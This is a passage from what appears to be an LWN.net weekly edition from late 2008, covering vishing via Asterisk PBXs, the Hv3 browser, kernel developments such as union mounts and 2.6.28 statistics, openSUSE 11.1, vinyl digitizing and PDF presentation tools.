Phones have certainly been used in scams over the years, but the advent of 
caller ID has tended to put an undeserved stamp of authenticity on certain 
calls.  If a pre-recorded message purports to come from GiantCompany and the
caller ID entry has that name, it is easy to conclude that the call is genuine.
Much of the same effort that has gone into educating the public about phishing
will also need to be applied to vishing.


This is certainly not the first instance of PBX systems being abused either.
Subverting PBXs for free long distance calls is a longstanding trick in the
"phreaking" community.  But Asterisk provides a much more capable platform, 
thus a much more useful tool, both for those that run them and those that 
subvert them.  Asterisk users need to keep that in mind when security
issues come to light.


		Hv3 and the art of minimalist web-browsing


Even if you appreciate full-featured applications like OpenOffice.org,
Firefox, or GNOME, minimalist replacements have a fascination all their
own. Not only are minimalist applications a throwback to the original
traditions of Unix-like operating systems, but their emphasis on efficiency
at the expense of extra features can force you to re-evaluate your
computing needs. A case in point is Hv3, a web browser written in
Tcl/Tk. Although currently in alpha and paying more attention to
developers' needs than those of end users, Hv3 is already highly suitable
for basic web-browsing, with a design philosophy all its own -- and, quite
possibly, the fastest performance of any free software browser.


Hv3 is available for
both GNU/Linux and Windows. Packages of nightly builds are available for
Puppy Linux, but the users of most distributions must fall back on
statically-linked tarballs, following the instructions on the download page
to obtain the latest build with wget, then de-compress it and change the
permissions. You can also download the
source code, as well as Tkhtml3, a development tool for
embedding 
standards-compliant HTML/CSS implementation in applications that Hv3 uses.


When you start Hv3, you also have the option of install hv3_polipo, a small
web cache, in the same directory. You can run Hv3 without hv3_polipo -- at
the expense of clicking through the same dialog each time you start the
application -- but, if you are end-user, there is no reason not to install
hv3_polipo. In fact, there is every reason to do so, since it increases
Hv3's speed by at least 25%.


Using Hv3

Hv3 opens on a gun metal gray window with four top-level menus, a
toolbar consisting of five basic navigation choices, and the URL entry field
(as well as debugging tools that are, presumably, temporary). At the bottom
is a status bar that gives instructions for toggling between modes, but


apparently does nothing yet. Both bookmarks and downloads open in separate
tabs, rather than in a menu or a floating window, which makes for a less
cluttered appearance than in most browsers, but does result in each new tab
opening by displaying bookmarks. This default occasionally comes in handy,
but is more often an annoying preliminary step to what you really want to
do.


Two unusual features in the Hv3 window are the ability to hide the menus
and toolbar to maximize display space, and a tree view of the page's HTML source.
Both are available from the right-click menu for a link. The tree
view is especially welcome, since it is quicker to navigate than the plain
text file of markup you get in most browsers. The difference, I suspect, is
that the Hv3 assumes that users are actively interested in looking through
the markup and using it as efficiently as possible, so that the view is not
just an after-thought.


So far, at least, search capacity is minimal in Hv3, differing little from
Firefox's except in the fact that searches of both the web and the current
page are grouped together and given prominence by a top-level search
menu. Again, the impression is that Hv3 developers are thinking of what
might be convenient for those who make regular use of the feature.


You can configure Hv3 from the Options menu, choosing the icon set to use
in the toolbar, and the size (but not the typeface) to use for the widgets
and on web pages. For some reason, you have three choices for font size on
web pages: The page zoom, the font scale (a percentage), and the font size
table (a description). You also have the option of disabling the display of
images for greater speed, and for turning off support for ECMAScript, which
provides support for what is commonly referred to as JavaScript.


Bookmarks

As you explore Hv3, you will probably want to start by opening the Bookmark
tab. For one thing, Hv3 seems to have paid most attention to bookmarks
among the most common browser features. Because bookmarks in Hv3 open in a
separate tab, they display a tree-view list on the left, and the actual
page on the right, making them easy to learn.


More importantly, the default bookmarks include a short but adequate page
explaining the features of Hv3. An especially noteworthy feature is the
distinction between regular bookmarks, which open directly on the page, and
snapshots, an archived version of a bookmark that can be used to work
off-line. You can tell a regular bookmark because it is indicated in the
tree view by having a cyan colored circle for an icon, while a snapshot has
an icon resembling a page. 


There is also a third type of bookmark that is a snapshot that retains a
link to the original. You tell this type of icon by clicking on it and
watching it toggle back and forth between the other two, a distinction that
seems all too easy to miss.


Another reason for turning early to the Bookmarks tab is to use the Import
Data button to import bookmarks from Firefox. The process lasts less than
ten seconds, and is almost formidably efficient: Not only your personal
bookmarks, but the default bookmarks for your distribution and Firefox's
default bookmarks are added to the tree view -- regardless of whether they
still appear on your personal toolbox in Firefox or not.


Speed vs.Geekiness

Many of Hv3's features suggest an effort to rethink functionality that you
can easily take for granted in your daily browsing. However, what interests
many people about minimalist web browsers is their speed. In this category,
Hv3 is in a class by itself. Without hv3_polipo installed (see above), Hv3
loads pages roughly 50% faster than Firefox, and about the same speed as Dillo, perhaps the best known minimalist
browser. However, with hv3_polipo installed, Hv3 loads pages nearly twice
as quickly  as Firefox, and about 50% faster than Dillo. 


Moreover, Hv3 has the advantage over Dillo of supporting JavaScript, which
means that it displays more pages correctly than Dillo does -- although, if
you are watching, you will see any text-only alternative pages display
before Hv3 renders a JavaScript page. If Hv3 would only include a Flash
plugin, possibly using Gnash, the free Flash replacement, then its users
would have few basic reasons to envy the users of heavyweight browsers like
Firefox except the absence of an active extensions-building community.


In its current release, Hv3 pays little attention to usability. Not only
are the debugging tools prominently displayed, but some of the options,
such as "GUI fonts" or "Force CSS metrics" seem pitched at the understanding of
developers more than that of everyday users. However, the interface names
are not that hard to figure out, particularly since they are relatively
few. Presumably, too, the Hv3 team is more concerned with performance right
now than finishing details, and will get around to such concerns closer to
the first full release. 


For now, the lack of polish seems a small price to pay for the speed and
simplicity of Hv3 -- to say nothing of the reminder that useful and
thoughtful alternatives exist to well-known applications.


		Followups: performance counters, ksplice, and fsnotify


There's been progress in a few areas which LWN has covered in the past.
Here's a quick followup on where things stand now.

Performance monitors

In last week's episode, a
new, out-of-the-blue performance monitoring patch had stirred up discussion
and a certain amount of opposition.  The simplicity of the new approach by
Ingo Molnar and Thomas Gleixner had some appeal, but it is far from clear
that this approach is sufficiently powerful to meet the needs of the wider
performance monitoring community.

Since then, version 3 and version 4 of the patch have been
posted.  A look at the changelogs shows that work on this code is
progressing quickly.  A number of change have been made, including:


 The addition of virtual performance counters for tracking clock time,
     page faults, context switches, and CPU migrations. 

 A new "performance counter group" functionality.  This feature is
     meant to address criticism that the original interface would not allow
     multiple counters to be read simultaneously, making it hard to
     correlate different counter values.  Counters can now be associated
     into multiple groups which allow them to be manipulated as a unit.
     There's also a new mechanism allowing all counters to be turned on or
     off with a single system call.

 The system call interface has been reworked; see the version 3
     announcement for description of the new API.

 The kerneltop utility has been enhanced to work with performance
     counter groups.

 "Performance counter inheritance" is now supported; essentially, this
     allows a performance monitoring utility to follow a process through a
     fork() and monitor the child process(es) as well.

 The new "timec" utility runs a process under performance monitoring,
     outputting a whole set of statistics on how the process ran.


There are still concerns about this new approach to performance monitoring,
naturally.  Developers worry that users may not be able to get the
information they need, and it still seems like it may be necessary to put a
huge amount of hardware-specific programming information into the kernel.
But, to your editor's eye, this patch set also seems to be gaining a bit of
the sense of inevitability which usually attaches itself to patches from
Ingo and company.  It will probably be some time, though, before a decision
is made here.

Ksplice

In November, we looked at a
new version of the Ksplice code, which allows patches to be put into a
running kernel.  The Ksplice developers would like to see their work go
into the mainline, so they recently poked Andrew Morton to see what the
status was.  His response was:


	It's quite a lot of tricky code, and fairly high maintenance, I expect.
	
	I'd have _thought_ that distros and their high-end customers would
	be interested in it, but I haven't noticed anything from them.  Not
	that this means much - our processes for gathering this sort of
	information are rudimentary at best.


The response on the list, such as it was, indicated that the distributors
are, in fact, not greatly interested in this feature.  Dave Jones commented:


	It's a neat hack, but the idea of it being used by even a small percentage
	of our users gives me the creeps....
	
	If distros can't get security updates out in a reasonable time, fix
	the process instead of adding mechanism that does an end-run around it.
	Which just leaves the "we can't afford downtime" argument, which leads
	me to question how well reviewed runtime patches are.
	Having seen some of the non-ksplice runtime patches that appear in the
	wake of a new security hole, I can't say I have a lot of faith.


The Ksplice developers agree that the
writing of custom code to fit patches into a running kernel is a scary
proposition; that is why, they say, they've gone out of their way to make
such code unnecessary most of the time.

This discussion leaves Ksplice in a bit of a difficult position; in the
absence of clear demand, the kernel developers are unlikely to be willing
to merge a patch of this nature.  If this is a feature that users really
want, they should probably be communicating that fact to their
distributors, who can then consider supporting it and working to get it
into the mainline.


fsnotify

The file scanning mechanism known as TALPA got off to a rough start
with the kernel development community.  Many developers have a dim view of
the malware scanning industry in general, and they did not like the
implementation that was posted.  It is clear, though, that the desire for
this kind of functionality is not going away.  So developer Eric Paris has
been working toward an implementation which will pass review.

His latest attempt can be seen in the form of the fsnotify patch set.  This code
does not, itself, support the malware scanning functionality, but, says
Eric, "you better know it's coming."  What it does, instead,
is to create a new, low-level notification mechanism for filesystem events.

At a first look, that may seem like an even more problematic approach than
was taken before.  Linux already has two separate file event notifiers:
dnotify and inotify.  Kernel developers tend to express their
dissatisfaction with those interfaces, but there has not been a whole lot
of outcry for somebody to add a third alternative.  So why would fsnotify
make sense?

Eric's idea seems to be to make something that so clearly improves the
kernel that people will lose the will to complain about the malware
scanning functionality.  So fsnotify has been written - employing a lot of
input from filesystem developers - to be a better-thought-out, more
supportable notification subsystem.  Then the existing dnotify and inotify
code is ripped out and reimplemented on top of fsnotify.  The end result is
that the impact on the rest of the VFS code is actually reduced; there is
now only one set of notifier calls where, previously, there were two.  And,
despite that, the notification mechanism has become more general, being
able to support functionality which was not there in the past.

And, to top it off, Eric has managed to make the size of the in-core
inode structure smaller.  Given that there can be thousands of
those structures in a running system, even a small size reduction in their
size can make a big difference.  So, claims Eric, "That's
right, my code is smaller and faster.  Eat that."

What this code needs now is detailed review from the core VFS developers.
Those developers tend to be a highly-contended resource, so it's not clear
when they will be able to take a close look at fsnotify.  But, sooner or
later, it seems likely that this feature will find its way into the
mainline.

		Development statistics for 2.6.28


As of this writing, the 2.6.28 kernel is getting quite close to its final
release.  The flow of patches into the mainline repository has slowed to a
trickle.  So it become appropriate to look at what was done in this
development cycle, and where all that code came from.

In these articles, your editor routinely forgets to thank Greg
Kroah-Hartman, who continues to 
do a lot of work to ensure that these statistics are at least moderately
accurate.  So we'll get that taken care of at the outset: thanks, Greg!


The 2.6.28 development cycle has seen the incorporation of just under 9,000
changesets; that makes it a bit smaller in this regard than 2.6.27 (10,600)
or 2.6.26 (10,100).  The development base broadened, though; 1,262
developers have contributed to 2.6.28, more than has been seen with its
predecessors.  Those developers added 769,000 lines of code while removing
285,000, for a net growth of 484,000 lines - a relatively large amount.
Much of that growth came by way of a single developer, as we will see
below.


In recent development cycles, some 25% of the patches merged were accepted
after the close of the merge window.  Linus Torvalds has been making sounds
about tightening the criteria for patches during the stabilization period,
to the point that they would have to address known regressions to be
accepted.  A look at 2.6.28, though, shows that 1835 patches (so far) have
gone in since 2.6.28-rc1.  At 20% of the total, the patch flow rate during
the stabilization period has fallen - but not by much.


So where did these patches come from?  Here's the top twenty contributors
to 2.6.28:


On the changesets side, David Miller contributes a lot of work to the
network stack, but the bulk of his changes this time around are to the
SPARC architecture code.  Yinghai Lu is a constant source of x86
architecture patches.  Al Viro returns to the list with a lot of cleanup
work in the VFS code, user-mode Linux, and beyond.  Bartlomiej
Zolnierkiewicz continues to clean up the legacy IDE code, despite the fact
that its user base is shrinking.  And Alexey Dobriyan contributed work in a
number of areas, with the bulk of it being in the netfilter subsystem and
/proc.

When looking at changed lines, one gets the sense that Greg Kroah-Hartman
has been rather busy this time around.  As it happens, Greg did not
actually write most of that code; the bulk of it came in with the addition of
the -staging tree.  It seems that Greg, the self-named "maintainer of
crap," has acquired substantial amounts of it.  Inaky Perez-Gonzalez was
the source of the patches adding support for ultrawideband radio and
wireless USB.  Expect to see him show up again soon; he is now working to get the
WIMAX subsystem into the kernel.  Mark Brown added drivers for a number of
Wolfson Micro devices.  Joseph Chan contributed the VIA framebuffer driver,
and Pavel Machek added a handful of miscellaneous drivers.

So who paid for this work to be done?  The 2.6.28 employer table looks like
this:


In general, the employer tables tend not to change too much from one
development cycle to the next.  Greg's staging tree work did put Novell at
the top of the lines-changed column, despite the fact that this work did
not originate at Novell.  As always, one needs to bear in mind that these
numbers are approximate.

One welcome change is the first-time appearance of VIA.  It
appears that this company is truly getting serious about supporting Linux,
and that can only be a good thing.


Writing all this code is important, but so is reviewing, testing, and
reporting bugs.  Continuing with a relatively new tradition, we'll look at
who shows up in patch tags indicating this kind of participation, starting
with the reviewers:


At this point, we are seeing about one Reviewed-by tag for every 100
changes going into the mainline repository.  Fortunately, the review
situation is not quite that bad; most reviewers simply do not provide these
tags for the patches they look at.

The numbers for bug reporting and patch testing look like this:


In each case, everybody with at least two credits was listed.  The good
news is that, while there's certainly some familiar names on that list, we
are also seeing appearances by people who are not known as kernel
developers.  There really is a testing community out there which includes
more than just developers.  Your editor suspects that we still are not
doing a very good job of crediting them for their work, but this convention
is relatively new and we can still hope for progress in this direction. 
To that end, the developers who are crediting reporters and testers are:


A quick grep shows that the number of Reported-by and Tested-by tags in
patches was almost exactly the same over the 2.6.27 and 2.6.28 development
cycles.  Given the smaller number of patches in 2.6.28, this indicates that
a slightly higher percentages of patches are now carrying those tags.
Emphasis on "slightly" is in order, though; we are, for the most part,
still not crediting a great many people who have helped to get 2.6.28 into
shape.

		Unifying filesystems with union mounts


Unification of filesystems is the concept of mounting several filesystems
on a single mount point, with the resulting mount showing the
logical combination of all the filesystems. Traditionally, when a
filesystem is mounted on a directory, the existing contents of the
directory are masked, and the content of the latest mounted 
filesystem is shown. These masked files are available only after the
mounted filesystem is unmounted. Even though these files exist, they
are inaccessible to the user. Union mount overcomes this by
providing access to all directories and files present in the
directory, even after a mount.

In the kernel, the filesystems are stacked in order of their mount
sequence, the first mounted filesystem is at the bottom of the
mount stack, and the latest mount is at the top of the stack. Only the
files and directories of the top of the mount stack are visible.
With union mounts, directory entries from the lower filesystems are
merged with the directory entries of upper filesystem, thus making a
logical combination of all mounted filesystems. Files with the
same name in a lower filesystem are
masked, as the upper one takes precedence.

Union mounts could be used to update packages of a distribution on a
DVD. A writable filesystem could be mounted over the read-only filesystem
on the
DVD. All new and updated package files would be written to the writable,
topmost filesystem, while hiding the duplicate files of the read-only
media, or even deleting files (this is done through white-outs
discussed later). This allows the user to change any of the files on
the system, with the new file stored transparently in the image.
Such a setup could be used to roll-up an updated DVD, or maintain
a package repository with the latest packages for network installs.

As compared to other implementations, such as unionFS, union mounts 
try to do all directory entry unification handling in the VFS layer, instead
of creating a new filesystem type. Some of the advantages of this
approach are:

Simple and Lightweight Design: Since all merges happen inside
   VFS, there is no need for an additional filesystem layer 
   to maintain and merge metadata.
 No need to re-iterate the mount stack by the user while mounting:
   the user is not required to list the directories participating in
   the union as a part of the mount command. Only the mount point is
   enough.
 Bind mount works without any problems: this is a VFS feature to
 remount part of the filesystem hierarchy  
 at additional mount points.


Union mount, 
developed by Jan Blunck, Bharta B Rao, and Miklos Szeredi,
is the first step in unifying mounts in the VFS.
The patch implementation is similar to that of the
Plan 9/Inferno
operating system. Currently, it only does namespace unification at
the root directory level and not in the subdirectories. 

To mount directories through union mount, the mount command
must be modified to recognize and set the union mount
options. The util-linux patches that update the mount command can be found at

ftp://ftp.suse.com/pub/people/jblunck/union-mount/

As an example, consider the following directory structure of
two filesystems:


Issuing the following commands will perform a union mount:


After the union, the directory structure looks like:


Unmounting the /mnt directory unwinds the filesystem mount stack:


The filesystems are stacked in the mount order in the
kernel. The MNT_UNION flag in vfsmnt is set while
mounting union mounts. 
This helps to identify that the directory entries of
the stacked filesystems are supposed to be merged. While performing
the lookup sequence, if the MNT_UNION flag is set, all root directory
entries of all filesystems are scanned. Scanning happens from top of
the filesystem stack to bottom, and the first matching entry is
returned. This way any duplicate entries in underlying filesystems are
automatically ignored.

Similarly, for the readdir() call, the directory entries are read from
the topmost union mount directory to the lowest, and collected in the
cache. The cache is responsible for collecting and keeping the
directory entries across the stacked filesystem, with different
callbacks for each filesystem. Like regular files, directories are  
seekable and the position of the following read is marked by the file
position filp-&gt;f_pos. When reading from directories across
filesystems,  
it is possible that the file position exceeds the inode size of the
directory where it is merged. In such a situation, the file position
is rearranged to select the correct directory in the union stack. This
is done by subtracting the inode size if the file position exceeds
it and selecting the next member of the union.


This works for filesystems such as ext2 that use flat file directories.
The directory entry offsets are arranged linearly and are always smaller than
the inode size of the directory. However, some filesystems return
special cookies as directory entry offsets which are unrelated to the
position in the directory or the inode size. Updating file-&gt;f_pos to
accommodate more directories does not not work for such filesystems.


There can be multiple calls to readdir()/getdents()
routines for reading 
the entries of a single directory. Currently, the union directory cache is not
maintained across these calls. Instead, for every call the previously
read entries are re-read into the cache and newly read entries are
compared against these for duplicates before being returned
to user space. The developers are working on making this 
efficient by maintaining the cache across
readdir()/getdents() calls. 

Future Plans: Writable Unions

Currently, the namespace unification is limited to the root filesystem
directory entries. Future plans, known as writable unions,  would
come close to the implementations of unionfs namespace unification.
Directory entry merging would not be limited to the root filesystem,
but would be done for subdirectories as well. Though these patches
have been developed, they still require some time and clean up for
the mainline.

Using the example above, a writable union mount of the two filesystems
would contain: 


Note that dir1 directory now contains both file_b1 and file_c1.

All writes are directed to the topmost mounted filesystem if it is mounted
read-write. 
Mounting a new filesystem upon the current union mount makes all
filesystems lower in the stack read-only, though the unified namespace
would appear read-write to the user. Any modifications in the files
of lower filesystems is handled through copy-on-write. If a
file belonging to the lower layers of the stack is opened, the entire
file is copied on the topmost filesystem on the stack. This is also
known as copy-up, where the file is copied to the topmost layer if it
has to record a change. While performing a copy-up, the directory path
of the file is also recreated on the topmost filesystem, so that the
next time it is mounted as a union, it appears in the same location.
The older file gets masked during the directory merge the next time
the filesystems are union-mounted in the same order.

Rename on union mounts is handled through -EXDEV. -EXDEV
is returned 
in a rename() operation if the source and destination file paths are
on different mounted filesystems. In such a case, the application,
such as mv, resorts to a copy operation, and unlinks the file from
which the filesystem moved. On union mounts, since any writes are
performed in the topmost layer, a move operation to directories in the
lower layers returns -EXDEV, which means the application must copy the
file to the new directory. If both the source and destination of the
rename() operation are in the topmost later, the traditional
rename method is 
used.

Deletion of files is handled by a special file type called white-outs.
The white-out file type is similar to negative dentries:
they describe a filename which isn't there. This is used to mark a
file in the lower read-only filesystem as deleted, since only the
topmost layer can be modified. However, white-outs would require support
from all the filesystems, to store and recognize such a special
file type. Currently, there is a special type, DT_WHT defined in 
include/linux/fs.h which defines a white-out, but is not in use.

Directory namespace unification is a tough task. FreeBSD
implementations gave up after calling it "messy code", while unionfs
entered the -mm tree for a brief period, it did not make it to
mainline. Since the unification is a pathname-based it is
best handled in the VFS instead of using a separate
stacked filesystem. The union mount offers a cleaner and more lightweight
approach for merging directories, however getting it
to adhere to POSIX compliant directory calls such as telldir() or
seekdir()
is still a challenge and is currently being worked on.

The git repository to track union mounts is located at:

under
the union-dir branch. The union mounts developers intend to release
the patches in a phased manner, starting with the current patch of
root directory level merging. Further developments would see 
patches related to merging at the subdirectory level as well.

		Refining the Process of Digitizing Vinyl Records


In October, your author
discussed
the process of digitizing vinyl records for the creation of a
digital audio library.  Since that time, the process has been
performed on around 40 disks and a number of refinements have been made.
This article discusses what has been learned in that time.


One part of the digitizing process that has proven to work well involved
treating one side of the original media as a single chunk of data.
Many of the processing steps can be performed on these large data chunks
before splitting up the individual tracks.


After making numerous recordings, it was discovered that a single
record level, 93 on the inputs of the M-Audio Delta 44, consistently
produced recordings with a useful volume range on the majority of
the records that were copied.
An interesting phenomenon was observed with some recordings that were
recorded with too much gain.  On loud passages, as the waveform reached
the upper or lower limit (rails in electronic-speak), instead of
just flattening out, a complete inversion of the wave would occur,
resulting in harsh sounding rail-to-rail glitches.
The source of the problem is open to speculation.
If this should occur, it is best to make a new recording of the
album side with a lower input level.


Having two machines handy has helped to optimize the audio processing work.
One machine is dedicated to making the initial album side
recordings.  The sides are minimized in size by removing data
before and after the recorded audio starts, and fade-ins
and fade-outs are added to whole album side.
The album sides are copied to another machine with a faster processor
for further processing.  The original copy is kept around as a backup
until the side has been fully processed.  After copying the recorded
album side to the secondary machine, a new recording can be started
on the recording machine.


The process of removing clicks and scratches from an album side has seen
the most changes since the original article.  This is a bit of a learned
art. The first step now involves visually inspecting the waveform of the
album side with Audacity.  Often a few huge spikes will be visible
on the recording.  They can be removed by repeatedly selecting an area
and zooming in until the zoom resolution shows individual samples as
dots.  The repair operation should be performed on all of the large
clicks.  Smaller clicks can often be found and removed by zooming into
the quiet passages, an almost infinite amount of of hunting, zooming and repairing can be done.


Another good way to find clicks is to listen, pause, remove and move on.
Most tracks can be cleaned up to a reasonable level without too much
effort.  Some albums can contain an incredible number of clicks while
others can be nearly click-free.
After the manual deglitching is done, the automated click removal
step can be performed.  This is now optional, but it can find additional
clicks that are buried in busy waveforms.


After whatever amount of declicking seems reasonable, the audio is
exported from Audacity as a .wav file.  Before exiting Audacity,
the Stereonorm script
(available here)
is run on the .wav file to bring the left and right channel levels
up to 100% volume.  If the normalization results look reasonable
compared to the Audacity visual representation of the recording,
Audacity is exited and restarted with the normalized recording.
If the normalization numbers seem right compared to the visual wave
representation, it is often possible to remove more offending large
clicks, export again and rerun the normalization step.
Although it may make audiophiles cringe, it may be beneficial to
use the repair function to shave the level off on the peaks of
loud percussive waveforms.  Done sparingly, this can be used to
fix balance problems encountered during the normaliztion step.


The version of Audacity that your author has been using,
1.3.4-beta on Ubuntu 8.04, has a few bugs that can cause
crashes and the loss of time-consuming work.  Occasionally after doing
a lot of repairs, attempting to export a file as .wav produces a
long stream of zero-length write errors.
It is usually possible to recover from this by writing
out the data in the Audacity native .aup format, exiting and restarting
Audacity with the .aup file, and trying the .wav export again.
On numerous occasions, adding a label track followed by doing more
click repairs has caused Audacity to crash.  It is advisable to
perform the labeling step on a new instantiation of Audacity.
Hopefully these bugs to disappear when the system gets updated
to a newer version of Audacity.


After investing many hours into the creation of a large audio library
(now up to around 200GB), it becomes critical to back up the data.
Fortunately, the price of IDE disks has dropped as fast as the capacity
has risen and hard drives can be treated as high capacity data cartridges.
Backups can easily be done by adding a temporary SATA or USB
drive to a system and running an efficient rsync operation to copy
any new or changed data to the offline archive.


		openSUSE 11.1 is out


openSUSE 11.1 was released this week.  This
point release contains new features and bug fixes.  A series of sneak peeks looks
at KDE 4.1.3, The Latest GNOME Desktop, Improved Installation, Easier
Administration and more, with plenty of eye candy.

There is a look at the download
numbers as of December 24, 2008 and lots of
coverage.  DistroWatch summed up a lengthy
review with:

My only reservation is to do with proprietary codecs and drivers, which
still needs some work to reach the same level as other distributions.  For
new users, this is still just too hard. I tried to get 3D working with
ATI's proprietary driver and gave up in the end (X worked, but no 3D due to
OpenGL errors). The 'recommended packages' feature of the package manager
is a great idea and does install MP3 support automatically, but this is
still second rate and users expect more. Overall I really feel that this
version of openSUSE provides a complete desktop experience for the
user. What does it have to offer you?  Download it and give it a try, you
might be pleasantly surprised at what you find.


This version of openSUSE comes with a new OpenSUSE License with no EULA.

DaniWeb interviewed
community manager Joe "Zonker" Brockmeier.

What's new in openSUSE 11.1?

Tons. :-)

More specifically, we have a lot of new software -- OpenOffice.org 3.0,
GNOME 2.24, KDE 4.1.3, Banshee 1.4, and a lot more. We've also updated some
important YaST modules (YaST is the system management tool for openSUSE)
including the partitioner, printer module, and security module that allows
users to examine their system's security.

This release also introduces a major new feature called Nomad, which is a
new remote desktop technology. (http://en.opensuse.org/Nomad)

This was also a major update in other ways. First, this is the first
release that was built in the openSUSE Build Service, which is an important
step for allowing more contributions from the community over time. Also, we
introduced a new, more friendly license and we removed some pieces of
software from the DVD media that prevented redistribution, so now openSUSE
is easier to obtain and distribute than ever before.


We asked openSUSE developers to share a little about their views of the
best new features or what they are most excited about?  We will conclude
this article with their responses.

Greg Kroah-Hartman:

The new kernel version update, to the 2.6.27 release series, provides
support for many new devices and platforms over the previous openSUSE
releases.


Aaron Bockover:

I am excited about Mono 2.0 in openSUSE 11.1 as it brings a number of major
performance, memory, and stability improvements to our applications. From
the developer point of view, Mono is more compelling than ever with full C#
3.0 support. openSUSE is hands-down the best distribution for developing on
Mono.


Michael Meeks: 

My favourite OpenOffice.org feature, and a world-first, is the split
build; this allows you to quickly compile just 'writer' against your
installed libraries (finally, like all other applications); so you can
get involved with OO.o much more easily.

My second favourite is the console help when invoking a missing tools,
telling you the command to install it and the respective package -
that combined with the speedy zypper makes life exceeding smooth.


Hans Petter Jansson:

I think one of my favorite 11.1 features must be that user switching
(switching to another logged-in user's desktop without logging out)
finally works seamlessly with GDM.


Joe 'Zonker' Brockmeier:

Of all the features and updates in this release, there are two things
that really make the release for me. One is the KDE 4 desktop, which
has come a very long way. It has a lot of polish and I'm really
impressed with the improvements since 11.0. The other is the new
license, which makes openSUSE much easier to redistribute and gets rid
of the EULA that openSUSE used to have.


		PDF-based presentations with 3-D effects


At first, the idea of adding 3-D transitions to command line presentation
software may give you a kind of cognitive dissonance. Just as you would if
someone had added a GPS tracking system to a one-horse cart plodding along
at two kilometers an hour, you have to wonder why anyone would bother. But,
the dissonance disappears as you start to explore the control and precision
you have in command-line programs like PDFCube and Impressive (formerly
KeyJNote). Both are small and efficient programs that allow you to add
transitions and other special effects to PDF-based presentations, although
the range of options varies considerably between the two programs. 


Before using either PDFCube or Impressive, you need to have to have support
for 3-D graphics installed. PDFCube works well with OpenGL, as well as with
the drivers and video cards listed on its hardware
compatibility page. By contrast, Impressive is somewhat more erratic
under OpenGL, with some transitions displaying slowly, especially when you
have less than two gigabytes of RAM available. However, by picking and
choosing effects, you can still test drive Impressive without resorting to
proprietary drivers. 


Both applications are available as source code from their project
sites. However, you will also need to install dependencies for PDF support,
such as Poppler for PDFCube, and Xpdf Reader or Ghostscript for
Impressive. Impressive also requires Perl and Python. For convenience, you
may prefer to use the Debian packages for both programs, or, in the case of
PDFCube, the packages available in the Fedora and Ubuntu
repositories. Impressive is also available for OS X and Windows. 

PDFCube


With version 0.0.3 just released, PDFCube is more a proof of concept than a
finished application. In fact, it currently has only one transition effect
— a spinning cube. However, a day after the latest release, maintainer
Mirko Maischberger has already posted a brief announcement on the project
home page that he has already started work on "an abstraction layer for 3D
effects (cube, fading, cover flow) to be done in C++ and OpenGL)." 


What you currently have in PDFCube is the basic engine. No options are
available, so all you need to type to try PDFCube is pdfcube
filename.pdf. 


However, before trying PDFCube, take the time to read its man page to learn
how to navigate within the program. Unlike full office applications like
OpenOffice.org Impress or KPresenter, PDFCube is driven completely by
keyboard commands, and — so far, at least — does not work with
the mouse 
at all. 


Fortunately, the basic commands are few. You press the 'c' or space key to
move to the next page of a presentation using an effect, or the PageUp key
to move to the next page without any effect or the PageDown key to move to
the previous page without effect. You can also use the 'h','j','k', and 'l' keys to
zero in on one of the corners of the current page, or the 'z' key to zoom in
on the center. Pressing any of these keys zooms out again, while Esc stops
the presentation. These are all the controls that you are likely to need. 


As Maischberger suggests on the project home site, the spinning cube is
easy to overdo, so you might want to limit its use to major
transitions. You can impose this limit by adding the page numbers
before the places you want the transition. For instance, if you
entered pdfcube filename.pdf 0 3, you would have the
spinning cube between pages 1 and 2 and pages 4 and 5 only. Other
transitions would lack the effect. 


Another point to be aware of with PDFCube is that is designed for landscape
oriented pages. You can display PDF files with a portrait orientation, but
the application currently gives you no way of scrolling up or down the
page. But, this limit aside, PDFCube shows a simplicity and performance
that you don't often see in its desktop equivalents. 

Impressive

At version 0.10.2, Impressive is already much more complete than
PDFCube. It not only runs slideshows from directories with BMP, JPEG, PNG,
and TIFF graphics as well from PDFs, but also includes a complete set of
controls for fine-tuning how its presentations run — to say nothing of
several unique controls for running a presentation. 


You can view a complete list of options with impressive
--help, or from the project documentation
page. They include options to set up an automatic slideshow, complete with
a loop from the end back to the beginning, to set the size of the
presentation window, and just about every other aspect of the running and
appearance of a presentation that you can imagine. Two especially
noteworthy options are -d, which allows you to set a time for
the entire presentation, then pace yourself by an unobtrusive bar along the
bottom of the screen, and -u, which polls original files
periodically to see if they are updated. 


If you want to use slide transitions, you will need to enter
impressive --listtrans to see a list of over 20 possible
transitions. All the transitions have names like SlideUp or WipeDownRight
that are clear enough to be self-explanatory, although the help screen does
include a slightly longer description. You can use a transition by adding
its name with the -t  option. However, unlike PDFCube,
Impressive currently limits you to a single transition for the entire slide
show — a limitation that might frustrate some users, but also prevents the
aesthetic disaster of anyone using too many. 


In addition, Impressive includes several handy controls. Pressing the Tab
key opens a view of all the slides in the presentation, while pressing the
Enter key enables a spotlight that follows the mouse and can be used as a
built-in pointer.  


Still another option is to draw an enclosed shape with the mouse, which
results in the rest of the screen darkening and blurring, so that the
audience's attention is focused on the area you defined. You can add
multiple highlighted areas, each of which you can close with a right
mouse-click. The screen returns to normal when you close the last
highlighted area. 


Impressive's view of all Slides is reminiscent of the slide view in many
programs, or the Sun Presenter Console for OpenOffice.org, but its
highlight boxes and spotlight are both features that I haven't seen in
desktop-oriented programs. These features alone make Impressive worth a
look, but more experienced users might also appreciate the wealth of
available options — even if they don't often use many of them. 

Conclusion

Both PDFCube and Impressive are works in progress, with some ways — and,
at the current rate of development, perhaps some years — to go before
their 1.0 releases. However, in the current versions, PDFCube has the
superior basic engine, while Impressive allows users the greater
control. Despite PDFCube's lack of options and Impressive's mediocre OpenGL
support, both are worth keeping at least an occasional eye on. 

 
In their separate ways, both demonstrate that, contrary to what many
desktop users seem to assume, command line applications are not just
archaic remnants. You need time to enter all the options in a command line
application, but, if you take the trouble to familiarize yourself with the
applications, you may find their controls easier to use than the cluttered
editing windows of a desktop application like OpenOffice.org Impress. Far
from being outdated, applications like PDFCube and impressive are practical
demonstrations that command line applications can be both modern and
innovative. 


		Justifying FS-Cache


In what must seem like a never-ending effort, David Howells is once again
trying to get a generic mechanism to do local caching for network
filesystems into the kernel.  The latest version, number 41, of his FS-Cache patches was posted back
in November, so now he is asking
for it to be added to linux-next.  That would mean that the feature was
on-track for the mainline in 2.6.29, but it would appear that
2.6.30—if ever—is more likely.


The idea behind FS-Cache is to create a way for "slow"
filesystems to cache their data on the local disk, so that repeated
accesses do not require accessing the underlying slow storage.  Howells has been
working on getting it into the kernel for a number of years; our first article about it appeared
in 2004.  The canonical example of where it might be useful is a
network filesystem on a heavily-used or low bandwidth link—the cost
of re-reading data from the network may be much higher than retrieving it
from a local disk.  In addition, the cache can be persistent across
